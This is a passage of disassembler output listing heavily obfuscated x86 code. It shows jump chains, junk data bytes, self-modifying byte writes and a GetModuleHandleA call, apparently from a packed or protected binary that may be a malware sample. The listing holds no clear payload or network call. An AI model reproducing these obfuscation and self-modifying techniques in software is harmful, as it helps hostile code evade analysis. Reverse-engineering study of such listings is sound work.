
		xor	eax, 74DCFBF5h
		add	eax, ebp
		add	eax, 74C66BB9h
		mov	eax, [eax]
		popf
		push	esi
		jmp	loc_48BD17
sub_48D1F9	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_602. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D968

loc_48D211:				; CODE XREF: sub_48D968+13j
		jmp	near ptr dword_48A0E4+2
; END OF FUNCTION CHUNK	FOR sub_48D968
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D217:				; CODE XREF: eu81y7qg:00489DD7j
		push	large dword ptr	fs:0
		call	sub_48D725
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AE52

loc_48D225:				; CODE XREF: sub_48AE52+9j
		jmp	near ptr dword_48A190+17h
; END OF FUNCTION CHUNK	FOR sub_48AE52
; ---------------------------------------------------------------------------
		dw 0C223h
		dd 0FFC673E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D233:				; CODE XREF: eu81y7qg:loc_48CB7Cj
		jl	loc_48DD03
		sbb	ebx, esi
		jg	loc_48C307
		jmp	loc_48DCF5
; ---------------------------------------------------------------------------
		align 4
		jz	loc_48B590
		jmp	loc_48A9BC
; ---------------------------------------------------------------------------
		align 4
dword_48D254	dd 58240487h, 0ABFBC081h, 0CB6843B1h, 0E90048DCh, 0FFFFD24Fh
					; DATA XREF: eu81y7qg:0048BCC1o
; ---------------------------------------------------------------------------

loc_48D268:				; DATA XREF: eu81y7qg:0048CD66o
		jmp	loc_48DBEE
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 0FFF02383h, 0CF9368FFh, 0ECE90048h, 0FFFFFCh, 0E9D88B00h
		dd 0FFFFF38Fh, 0F821C081h, 0B2E8F55Eh, 0E9000009h, 0FFFFF02Fh
		dd 0F3E90000h, 16h, 87D38B52h, 83682414h, 5BEF0E51h, 11B3E9h
		db 3 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D2B3	proc near		; CODE XREF: eu81y7qg:0048A9B6j
					; sub_48DE75+4D1p
		xchg	eax, [esp+0]
		pop	eax
		xor	eax, eax
		push	ebx
		push	offset loc_48BC4D
		jmp	nullsub_564
sub_48D2B3	endp

; ---------------------------------------------------------------------------
		dd 0EE8B0000h, 0D44D181h, 33E98F61h, 0FFFFF9h, 24148700h
		dd 4D85EB68h, 0E7815F1Eh, 0A02FFC60h, 0FFE2E9E9h, 240C87FFh
		dd 6859C18Bh, 0D0A0585Ah, 0E9242C87h, 0FFFFF282h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_48D2FD:				; CODE XREF: sub_48C117:loc_48D072j
		jns	loc_489AB9
		popf
		sbb	eax, edi
		jmp	loc_489A53
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
		align 4
		mov	ebx, [edx]
		jmp	loc_48E854
; ---------------------------------------------------------------------------
		align 4
		dd 0FFC363E8h, 0DE8B00FFh, 92F4F381h, 0C7E9A390h
		db 16h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CCBC

loc_48D327:				; CODE XREF: eu81y7qg:0048A9B0j
					; sub_48CCBC+Cj
		mov	edx, eax
		pop	eax
		add	esp, 4
		push	663FC4F2h
		pop	eax
		jmp	near ptr dword_489D20+0Eh
; END OF FUNCTION CHUNK	FOR sub_48CCBC
; ---------------------------------------------------------------------------

loc_48D338:				; CODE XREF: eu81y7qg:0048CE7Fj
		jno	loc_489B89

; =============== S U B	R O U T	I N E =======================================



sub_48D33E	proc near		; CODE XREF: sub_48AEB5+7p
		push	offset word_48E352
		jmp	nullsub_558
sub_48D33E	endp

; ---------------------------------------------------------------------------
		dd 0C5680000h, 0E90048AAh, 0FFFFDE5Ah
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D356:				; CODE XREF: sub_48DE75:loc_48C8B5j
		mov	ecx, offset loc_48B299
		jmp	loc_48D926
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 0D6E90000h, 87000017h, 0CB8B241Ch, 0F4F5E85Bh, 0E900FFFFh
		dd 8CDh, 0C7E88100h, 814F3679h,	7F1399C0h, 0FC0096Ah, 14F884h
		dd 0C67CE900h, 8B00FFFFh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D395:				; CODE XREF: sub_48DE75+771j
		or	eax, eax
		jz	loc_48B590
		push	eax
		mov	eax, 48A437h
		jmp	near ptr dword_48A7E0+0Bh
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D3AA:				; CODE XREF: sub_48DE75-140Aj
		mov	byte ptr [ecx],	8Bh

loc_48D3AD:				; CODE XREF: sub_48DE75:loc_48B36Bj
		pop	ecx
		push	eax
		mov	eax, offset loc_48A06B
		jmp	loc_48CB06
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C617

loc_48D3B9:				; CODE XREF: sub_48C617:loc_48CF15j
		push	offset byte_48C391
		jmp	loc_48D8CD
; END OF FUNCTION CHUNK	FOR sub_48C617
; ---------------------------------------------------------------------------
		align 4

loc_48D3C4:				; CODE XREF: eu81y7qg:00489A2Dj
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		mov	eax, offset loc_48EC9F
		jmp	loc_48AE4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D3D4:				; CODE XREF: sub_48DE75:loc_48E2E5j
		mov	eax, edi
		pop	edi
		or	eax, 8ADE8693h
		rol	eax, 8
		push	ecx
		jmp	loc_48C8B5
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D3E7:				; CODE XREF: eu81y7qg:0048CB47j
		call	loc_48E2C9
		mov	byte ptr [ecx],	0C3h
		pop	ecx
		mov	ecx, eax
		xchg	esi, [esp]
		jmp	loc_48C3FF
; ---------------------------------------------------------------------------
		dw 300h
; ---------------------------------------------------------------------------
		aad	81h
		retn	558Ch
; ---------------------------------------------------------------------------
		db 39h,	56h, 89h
		dd 0AE076802h, 73E90048h, 0FFFFEDh
; ---------------------------------------------------------------------------

loc_48D410:				; CODE XREF: eu81y7qg:0048B5CDj
		popf
		call	near ptr dword_489F0C+1
; ---------------------------------------------------------------------------
		dw 0
		dd 69689C51h, 593B3A32h, 811DC1C1h, 0B45FE7C9h,	0C15AE971h
		db 2 dup(0FFh),	0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_597. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFEB33h, 0FFBDE900h, 0FFFFh, 0FB0F890Fh, 487FFFFh
		dd 8B645824h, 3005h, 0FC7AE800h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D458:				; CODE XREF: sub_48DE75+222j
		jmp	loc_48B402
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D45F:				; CODE XREF: eu81y7qg:0048D5ACj
		jmp	locret_48E2C8
; ---------------------------------------------------------------------------
		dd 850F0000h, 0FFFFE17Dh, 0EDD5E900h, 0FFFFh, 15B0880Fh
		dd 0E95B0000h, 0FFFFE165h, 538D0F00h, 0F000007h, 0FFEE4180h
		dd 8C7B8FFh, 41E97B01h,	7, 24348700h, 9D128B5Eh, 50241487h
		dd 0FFD537E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D4A9:				; CODE XREF: sub_48DE75:loc_48CF6Dj
		pop	esi
		rol	esi, 9
		sub	esi, 0C3D1E8FFh
		and	esi, 0C940DE80h
		call	loc_48DF1A
		jmp	loc_48DAFD
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48E1A3
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48D4CB:				; CODE XREF: eu81y7qg:0048B251j
		retn
; ---------------------------------------------------------------------------

loc_48D4CC:				; CODE XREF: eu81y7qg:0048CBA0j
					; eu81y7qg:loc_48D57Fj
		jmp	loc_48D80B
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_561. PRESS KEYPAD	"+" TO EXPAND]
		dd 5FE90000h
		db 0C9h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D4DB:				; DATA XREF: sub_48DE75-3EDEo
		xchg	eax, [esp]
		push	offset byte_48AAAC
		jmp	loc_48A3EA
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48D4E9:				; CODE XREF: eu81y7qg:0048C962j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D4EB:				; CODE XREF: eu81y7qg:0048BDE0j
		jmp	locret_48E026
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D4F2:				; CODE XREF: eu81y7qg:loc_48B118p
					; eu81y7qg:0048B4F2j
		xchg	edx, [esp]
		pop	edx
		mov	byte ptr [edi],	9Dh
		pop	edi
		add	ecx, 0D3087A46h

loc_48D500:				; DATA XREF: eu81y7qg:00489CA8o
					; sub_48DE75-2152o
		mov	al, ds:0E9240CDFh
		movsb
		out	dx, eax
; ---------------------------------------------------------------------------
		db 0FFh
		dd 0F0000FFh, 0FFE0E98Fh
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48D511	proc near		; CODE XREF: eu81y7qg:0048DAC9p

; FUNCTION CHUNK AT 0048E6B2 SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ebx, 0F56071E5h
		jmp	loc_48E6B2
sub_48D511	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	0B7AC874Dh
		jmp	loc_48E8A3
; ---------------------------------------------------------------------------
		dw 0C5C1h
		dd 0CABFE817h, 0FFFFh, 0A9BE9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D53A:				; CODE XREF: eu81y7qg:0048A798j
		jmp	locret_48C96B
; ---------------------------------------------------------------------------
		align 10h
		shr	edi, 0Fh
		popf
		jmp	sub_48C693
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A51F

loc_48D54B:				; CODE XREF: sub_48A51F+1Cj
		pop	esi
		rol	esi, 1Bh
		add	esi, 0DC9216C4h
		or	esi, 0BA43729Fh
		add	esi, 44515FFCh
		jmp	near ptr dword_489F60+3
; END OF FUNCTION CHUNK	FOR sub_48A51F
; ---------------------------------------------------------------------------
		dw 8F0Fh
; ---------------------------------------------------------------------------
		sbb	ebp, 0FFFFFFFFh
		call	ecx
		mov	byte ptr [ecx-6B009232h], 6Dh
		push	offset byte_48E61F
		jmp	locret_48B1AD
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D57F:				; CODE XREF: eu81y7qg:0048B80Aj
		jl	loc_48D4CC
		mov	ecx, ebp
		jmp	loc_48C9EC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_574. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D58F	proc near		; CODE XREF: eu81y7qg:loc_489901p

; FUNCTION CHUNK AT 0048B9B5 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		lea	eax, dword_48E794
		jmp	loc_48B9B5
sub_48D58F	endp

; ---------------------------------------------------------------------------
		align 10h

loc_48D5A0:				; CODE XREF: eu81y7qg:loc_48BDE5j
					; DATA XREF: eu81y7qg:0048BDDBo
		pop	large dword ptr	fs:0
		push	offset byte_48DB1F
		jmp	loc_48D45F
; ---------------------------------------------------------------------------
		pop	ecx
		jmp	sub_48D725
; ---------------------------------------------------------------------------
		mov	eax, [esi]
		jmp	loc_48E648
; ---------------------------------------------------------------------------
		dw 5800h
		dd 0C20FBB53h, 0CFE90048h, 0FFFFC8h, 860FD503h,	0B65h
		dd 556E6850h, 81582C70h, 0EE1C25C8h, 189BE9B1h,	0E8810000h
		dd 501252E1h, 0FFCA33E9h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_606. PRESS KEYPAD	"+" TO EXPAND]
		align 4
dword_48D5F4	dd 158FFF6Ah, 45C0C0h, 87FE8B57h, 0A768243Ch, 0E99DA4C7h
					; DATA XREF: sub_48DE75+332o
		dd 0FFFFD998h, 5A241487h, 48B53B68h, 0CD45E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48D61B:				; CODE XREF: sub_4894C2+6p
		xchg	eax, [esp]
		pop	eax
		push	ebx
		call	sub_48C067
		add	al, ch
		sti
		jecxz	short near ptr loc_48D628+1 ; CODE XREF: eu81y7qg:loc_48D628j
		inc	dword ptr [ecx-6A5E6539h]
		and	al, 87h
		cmp	al, 24h
		jmp	loc_48A7C9
; ---------------------------------------------------------------------------
		align 2
		push	edi
		push	0AF76AC3Dh
		jmp	loc_48E248
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D647:				; CODE XREF: eu81y7qg:0048ACFAj
		xchg	ebx, [esp]
		pop	ebx
		push	eax
		push	0B0E79F49h
		xchg	esi, [esp]
		mov	eax, esi
		jmp	loc_48DEF9
; ---------------------------------------------------------------------------
		align 4

loc_48D65C:				; CODE XREF: eu81y7qg:loc_48DC33j
					; DATA XREF: sub_48DC25+4o
		add	eax, 89974409h
		jz	short near ptr dword_48D69C+30h
		in	eax, dx
		scasb
		dec	eax
		add	cl, ch
		arpl	sp, bp
; ---------------------------------------------------------------------------
		db 0FFh
		db 0FFh
		db  8Bh	; ‹
		db  38h	; 8
		db 0E9h	; é
		db    1
		db 0E7h	; ç
		db 0FFh
		db 0FFh
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D676	proc near		; CODE XREF: eu81y7qg:0048B6A1p
					; sub_48DE75+159j

; FUNCTION CHUNK AT 0048EA55 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	ecx, 0AC3E8B94h
		push	offset loc_48DC72
		jmp	loc_48EA55
sub_48D676	endp

; ---------------------------------------------------------------------------
		rol	esi, 10h
		popf
		cmp	ecx, 0D4D5C3E6h
		jmp	loc_48EE8C
; ---------------------------------------------------------------------------
		align 2
		dw 7C6h
dword_48D69C	dd 242C878Bh, 585DFD8Bh, 21AE881h, 0F0816BEFh, 0E8315551h
		dd 0FFDA34E9h, 0F70000FFh, 0E151E9D0h, 0FFFFh, 0D36E95Dh
		dd 81570000h, 33CF8FEFh, 0D16AE919h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D6D2:				; CODE XREF: eu81y7qg:0048D123j
		xor	ecx, 295DD68Dh
		sub	ecx, 29103FE2h
		test	ecx, 80h
		jmp	loc_48AA2C
; ---------------------------------------------------------------------------
		db 81h,	0E1h, 0B2h
		dd 811A89CFh, 488CB3C1h, 0F3E9FEh
		db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_569. PRESS KEYPAD	"+" TO EXPAND]
		dd 0A1EE900h, 0C3000000h, 0FFF05DE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CB88

loc_48D70B:				; CODE XREF: sub_48CB88-254Cj
		mov	byte ptr [edi],	87h
		pop	edi
		push	esi
		push	ebp
		pop	esi
		xchg	esi, [esp-4+arg_0]
		mov	ebp, esp
		jmp	loc_48A65E
; END OF FUNCTION CHUNK	FOR sub_48CB88
; ---------------------------------------------------------------------------
dword_48D71C	dd 0E8243C87h, 0FFFFE50Dh ; DATA XREF: sub_48A895-B96o
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48D725	proc near		; CODE XREF: sub_48EB80:loc_4895E8j
					; eu81y7qg:0048D21Ep ...

; FUNCTION CHUNK AT 0048A71E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048AB46 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048B1C0 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	eax
		push	0B380B617h
		jmp	loc_48B1C0
sub_48D725	endp

; ---------------------------------------------------------------------------
		dd 14870000h, 0B5D8B824h, 9AE90048h, 0FFFFF8h
; ---------------------------------------------------------------------------

loc_48D744:				; CODE XREF: eu81y7qg:0048A6F7j
		mov	byte ptr [edi],	9Ch
		pop	edi
		pushf
		push	8D2EB9F3h
		pop	ecx
		xor	ecx, 1AD2F647h
		add	ecx, 684C58CCh
		popf
		jmp	loc_48B00C
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 0E85B241Ch, 0FFFFCFF9h, 9FC88100h, 0E93AAB29h, 0FFFFBF80h
		db 0
; ---------------------------------------------------------------------------

loc_48D779:				; CODE XREF: eu81y7qg:loc_48EA0Bj
		mov	ebp, [esi]
		jmp	loc_48E5E0
; ---------------------------------------------------------------------------
		dd 0C870000h, 0F495924h
		db 85h,	9Ch
; ---------------------------------------------------------------------------

loc_48D78A:				; CODE XREF: eu81y7qg:0048D7FCj
		add	al, [eax]
		add	[edi], cl
		test	dh, dl
		sar	bh, 0FFh
		jmp	loc_48DD73
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_48D799:				; CODE XREF: sub_48C117-1C46j
		add	ebx, 0E02AD588h

loc_48D79F:				; DATA XREF: sub_48CB88-2551o
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_48B4A1
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
		align 4
		dd 0AA9F058Dh, 0C60048h, 0C0C1E8C3h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48D7B7:				; CODE XREF: sub_48C27A:loc_48BFC7j
		pop	ebx
		add	eax, ebp
		add	eax, 2BC34267h
		lea	eax, [eax]
		mov	bh, 51h
		pushf
		call	sub_48E71D
		jmp	loc_48E564
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------
		sbb	ecx, 0F94CEADEh
		jmp	sub_48C067
; ---------------------------------------------------------------------------
		dw 890Fh
		dd 0FFFFCC93h
; ---------------------------------------------------------------------------

loc_48D7E0:				; CODE XREF: eu81y7qg:loc_48B10Ep
		xchg	eax, [esp]
		pop	eax
		xchg	ebx, [esp]
		call	sub_48A315
		add	cl, ch
		db	36h
		adc	eax, 7AE90000h
		adc	[eax], al
		add	cl, al
		enter	6807h, 1Bh
		jp	short loc_48D78A
		xor	cl, ch
		or	edi, eax
; ---------------------------------------------------------------------------
		dw 0FFFFh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D806:				; CODE XREF: eu81y7qg:loc_48CC65j
		call	sub_48CBF4

loc_48D80B:				; CODE XREF: eu81y7qg:loc_48D4CCj
		and	eax, 793E1540h
		jnz	loc_48CAD2
		add	cl, ch
		xchg	dl, [edx]
; ---------------------------------------------------------------------------
		db 0
		dd 0E1C10000h, 0F2A6E907h, 0FFFFh, 5F243C87h, 5E8706C6h
		dd 0FFD0CBE8h, 0E90000FFh, 0FFFFCF39h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CB88

loc_48D83E:				; CODE XREF: sub_48CB88:loc_48C585j
		pop	esi
		call	sub_48A70F

loc_48D844:				; CODE XREF: eu81y7qg:0048B8BEj
		jmp	loc_48A632
; END OF FUNCTION CHUNK	FOR sub_48CB88
; ---------------------------------------------------------------------------
		align 2
		dw 1487h
		dd 0A3C6824h, 56590810h, 84127968h, 0EE95E5Eh, 0FFFFFCh
		dd 0B1E9CB13h, 0FFFFC9h, 4A8E0F00h
		db 0D5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48D86F:				; CODE XREF: sub_48B258:loc_48AADCj
		add	ebx, 0D8C31035h

loc_48D875:				; DATA XREF: sub_48B258+5o
		into
		fld	qword ptr [ecx+7377E3C3h]
		mov	ebx, 48E97268h
		add	cl, ch
		rol	dword ptr [edi], 0
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		dw 0
		dd 3C7F700h, 0E95B6605h, 5F2h, 14870000h, 78835A24h, 840F0010h
		dd 0FFFFF090h, 0FFEE62E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D9C3

loc_48D8A9:				; CODE XREF: sub_48D9C3+15j
		jl	loc_48BF2B
; END OF FUNCTION CHUNK	FOR sub_48D9C3
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D8AF:				; CODE XREF: sub_48DE75+5A0j
		jmp	nullsub_595
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 0E90DEBC1h, 0FFFFE663h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D8BE:				; DATA XREF: sub_48DE25+Bo
		sub	al, 99h
		push	offset word_48E942
		jmp	locret_48E934
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_580. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C617

loc_48D8CD:				; CODE XREF: sub_48C617+DA7j
		jmp	nullsub_590
; END OF FUNCTION CHUNK	FOR sub_48C617
; ---------------------------------------------------------------------------
		dw 1C87h
		dd 0C0815B24h, 9C3FB856h, 0FFFAA4E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48D8E1:				; CODE XREF: eu81y7qg:0048C6F7j
		jnz	loc_48B8BD
		jmp	loc_48E4DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48D8EC:				; CODE XREF: sub_48CF7E:loc_48E7F3j
		jnz	loc_48E2F6
		jmp	near ptr dword_4899DC+13h
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		align 4
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_615. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48D8FB:				; CODE XREF: sub_48B258+3A1Bj
		jmp	nullsub_579
; END OF FUNCTION CHUNK	FOR sub_48B258

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_48D900	proc near		; DATA XREF: sub_48C126+15o
		jmp	sub_48CAC2
sub_48D900	endp

; ---------------------------------------------------------------------------
		align 2
		dw 487h
		dd 0E9C88B24h, 0FFFFD113h, 0E90F8B00h, 0FFFFEDDBh
dword_48D918	dd 840FD209h, 0FFFFEF2Ch, 0FFEA3EE8h ; DATA XREF: eu81y7qg:0048E6D6o
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D926:				; CODE XREF: sub_48DE75-B1Aj
		jmp	loc_48AF39
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4

loc_48D92C:				; CODE XREF: eu81y7qg:0048C68Dj
		jmp	near ptr dword_489668+0CAh
; ---------------------------------------------------------------------------
		align 2
		dw 0C081h
		dd 0A4CC311Bh, 0FFD8AAE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]	; CODE XREF: sub_48DE75-52Aj
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D93E:				; CODE XREF: sub_48DE75:loc_48E3F1j
		or	eax, 4443B07Eh
		call	sub_48A09A
		add	cl, ch
		jl	short near ptr loc_48D93C+1
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0E9h
		dd 9D4h, 45E88100h, 8194C68Bh, 0D1D1C6F8h, 0FB1BE981h
		dd 0FFFFh

; =============== S U B	R O U T	I N E =======================================



sub_48D968	proc near		; CODE XREF: eu81y7qg:loc_48CF72p
					; sub_48DE75+559j

; FUNCTION CHUNK AT 0048D211 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		lea	eax, [ebp-18h]
		push	ecx
		push	eax
		pop	ecx
		xchg	ecx, [esp+0]
		call	ds:dword_45C0B4	; GetModuleHandleA
		jmp	loc_48D211
sub_48D968	endp

; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------

loc_48D983:				; CODE XREF: eu81y7qg:0048C38Cj
		jmp	locret_48D16E
; ---------------------------------------------------------------------------
		dd 45890000h, 0C79068FCh, 0FAE90048h
		db 0Ch,	2 dup(0)
; ---------------------------------------------------------------------------

loc_48D997:				; CODE XREF: eu81y7qg:0048CCD3j
		xchg	edi, [esp]
		xchg	esi, [esp]
		mov	edi, esi
		pop	esi
		add	eax, 1F7E56D4h
		push	48C991h
		jmp	near ptr dword_48B384+1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BAD9

loc_48D9B0:				; CODE XREF: sub_48BAD9:loc_48CB31j
		xchg	esi, [esp+0]
		push	81F80C39h
		pop	ecx
		rol	ecx, 15h
		jmp	near ptr dword_489668+0ECh
; END OF FUNCTION CHUNK	FOR sub_48BAD9
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_593. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_48D9C3	proc near		; DATA XREF: sub_48DE75:loc_48AD56o

; FUNCTION CHUNK AT 0048A5FA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048BF2B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048CF9D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0048D8A9 SIZE 00000006 BYTES

		mov	byte ptr [ebx],	31h
		pop	ebx
		rol	edx, 3
		xor	edx, eax
		call	sub_48DBFB
		add	cl, ch
		db	36h
		sar	edi, cl
		inc	dword ptr [eax]
		jmp	loc_48D8A9
sub_48D9C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 4872414h, 0C1D08B24h, 0B5E919C0h, 87FFFFF7h,	0E859240Ch
		dd 0FFFFE82Ah
		db 0
; ---------------------------------------------------------------------------

loc_48D9F9:				; CODE XREF: eu81y7qg:0048C4F5j
		jmp	loc_48A7BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48D9FE:				; CODE XREF: sub_48A315+17BEj
		push	151CF99Ch
		adc	esi, 3B77EABEh
		jmp	loc_48BCD4
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4894B7

loc_48DA0F:				; CODE XREF: sub_4894B7:loc_48CC6Cj
		mov	byte ptr [ebx],	0C3h
		xchg	edi, [esp+4+var_4]
		mov	ebx, edi
		pop	edi
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
; END OF FUNCTION CHUNK	FOR sub_4894B7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS	KEYPAD "+" TO EXPAND]
		align 10h
		db 0, 0C3h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A3C7

loc_48DA23:				; CODE XREF: sub_48A3C7+9j
		jmp	near ptr dword_48A464+3Ch
; END OF FUNCTION CHUNK	FOR sub_48A3C7
; ---------------------------------------------------------------------------
		cld
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48DA29:				; CODE XREF: sub_48C27A+5j
					; sub_48DBFB+5j
		jno	loc_48A44D
		jnb	loc_48E5AE
		lodsb
		push	edx
		jmp	loc_48D0FA
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E71D

loc_48DA3D:				; CODE XREF: sub_48E71D+10j
		and	ecx, 579A5FFAh
		add	ecx, 0AEB07A7Ah
		popf
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_48A8AA
; END OF FUNCTION CHUNK	FOR sub_48E71D
; ---------------------------------------------------------------------------
		align 4
		jnb	loc_48AA32
		jmp	loc_48C773
; ---------------------------------------------------------------------------

locret_48DA5F:				; CODE XREF: eu81y7qg:loc_48A650j
		retn
; ---------------------------------------------------------------------------

loc_48DA60:				; CODE XREF: eu81y7qg:0048AEDAj
		jmp	loc_48E27B
; ---------------------------------------------------------------------------
		align 2

locret_48DA66:				; CODE XREF: eu81y7qg:loc_48A7C9j
		retn
; ---------------------------------------------------------------------------
		db 0BEh
		dd offset dword_48CE38+17h
		dd 0FFF3D2E9h, 870000FFh, 515A2414h, 25607668h,	0C1C159EDh
